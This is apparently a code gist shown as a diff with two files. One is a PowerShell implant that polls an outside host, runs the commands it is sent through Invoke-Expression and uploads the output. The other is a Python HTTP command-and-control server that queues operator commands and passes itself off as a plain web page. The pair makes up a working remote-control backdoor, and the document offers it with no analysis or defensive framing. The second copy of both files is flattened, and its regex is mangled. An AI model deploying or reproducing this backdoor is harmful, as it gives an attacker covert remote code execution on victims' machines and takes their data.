FrankSpierings · December 12, 2019 14:27
diff --git a/plantable.ps1 b/plantable.ps1
 $url = "http://10.0.0.254:8000";
 $clientid = "1234567";
 $polltime = 5;

 $wc = New-Object System.Net.WebClient;
 $whc = New-Object System.Net.WebHeaderCollection;
 $whc.Add("X-Client-Id", $clientid)
 $wc.Headers = $whc

 while ($true) {
    $resp = $wc.DownloadString($url);
    if ($resp -match '(?si)<div .*?class="execute"\>\s*(?<command>.*?)\s*</div>') {
        $command = $Matches['command'];
        $Error.Clear();
        try {
            $output = ($command | IEX | Out-String);
        }
        catch {
            $output = $Error;
        }
        $wc.UploadString($url, $output) | Out-Null;
    }
    Start-Sleep $polltime;
 }
diff --git a/server.py b/server.py
 import time
 import queue
 import readline
 from http.server import HTTPServer, BaseHTTPRequestHandler
 from socketserver import ThreadingMixIn
 import threading
 import logging

 bindaddress = '0.0.0.0'
 bindport = 8000
 bindclient = '1234567' 

 commandqueue = queue.Queue()


 class Handler(BaseHTTPRequestHandler):
 	def log_message(self, format, *args):
 		pass

 	def do_GET(self):
 		self.send_response(200)
 		self.end_headers()
 		if (self.headers.get('X-Client-Id') == bindclient and not commandqueue.empty()):
 			self.wfile.write('<html>\n<body>\n<div class="execute">\n{cmd}\n</div>\n</body>\n</html>'.format(cmd=commandqueue.get()).encode())
 		else:
 			self.wfile.write(b'<html>\n<body>\nI am a website :)\n</body>\n</html>')

 	def do_POST(self):
 		body = self.rfile.read(int(self.headers.get('content-length')))
 		body = body.decode()
 		body += '\n$ '
 		print(body, end='')
 		self.send_response(200)
 		self.end_headers()
 		self.wfile.write(b'<html>\n<body>\nThanks\n</body>\n</html>')

 class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
 	pass

 	
 httpd = ThreadingSimpleServer((bindaddress, bindport), Handler)
 th_webserver = threading.Thread(target=httpd.serve_forever)
 th_webserver.start()

 try:
 	while True:
 		cmd = input('$ ')
 		if (cmd.strip() != ''):
 			commandqueue.put(cmd)
 except KeyboardInterrupt:
 	httpd.server_close()
	$url = "http://10.0.0.254:8000";
	$clientid = "1234567";
	$polltime = 5;

	$wc = New-Object System.Net.WebClient;
	$whc = New-Object System.Net.WebHeaderCollection;
	$whc.Add("X-Client-Id", $clientid)
	$wc.Headers = $whc

	while ($true) {
	$resp = $wc.DownloadString($url);
	if ($resp -match '(?si)<div .?class="execute"\>\s(?<command>.?)\s</div>') {
	$command = $Matches['command'];
	$Error.Clear();
	try {
	$output = ($command \| IEX \| Out-String);
	}
	catch {
	$output = $Error;
	}
	$wc.UploadString($url, $output) \| Out-Null;
	}
	Start-Sleep $polltime;
	}
	import time
	import queue
	import readline
	from http.server import HTTPServer, BaseHTTPRequestHandler
	from socketserver import ThreadingMixIn
	import threading
	import logging

	bindaddress = '0.0.0.0'
	bindport = 8000
	bindclient = '1234567'

	commandqueue = queue.Queue()


	class Handler(BaseHTTPRequestHandler):
	def log_message(self, format, *args):
	pass

	def do_GET(self):
	self.send_response(200)
	self.end_headers()
	if (self.headers.get('X-Client-Id') == bindclient and not commandqueue.empty()):
	self.wfile.write('<html>\n<body>\n<div class="execute">\n{cmd}\n</div>\n</body>\n</html>'.format(cmd=commandqueue.get()).encode())
	else:
	self.wfile.write(b'<html>\n<body>\nI am a website :)\n</body>\n</html>')

	def do_POST(self):
	body = self.rfile.read(int(self.headers.get('content-length')))
	body = body.decode()
	body += '\n$ '
	print(body, end='')
	self.send_response(200)
	self.end_headers()
	self.wfile.write(b'<html>\n<body>\nThanks\n</body>\n</html>')

	class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
	pass


	httpd = ThreadingSimpleServer((bindaddress, bindport), Handler)
	th_webserver = threading.Thread(target=httpd.serve_forever)
	th_webserver.start()

	try:
	while True:
	cmd = input('$ ')
	if (cmd.strip() != ''):
	commandqueue.put(cmd)
	except KeyboardInterrupt:
	httpd.server_close()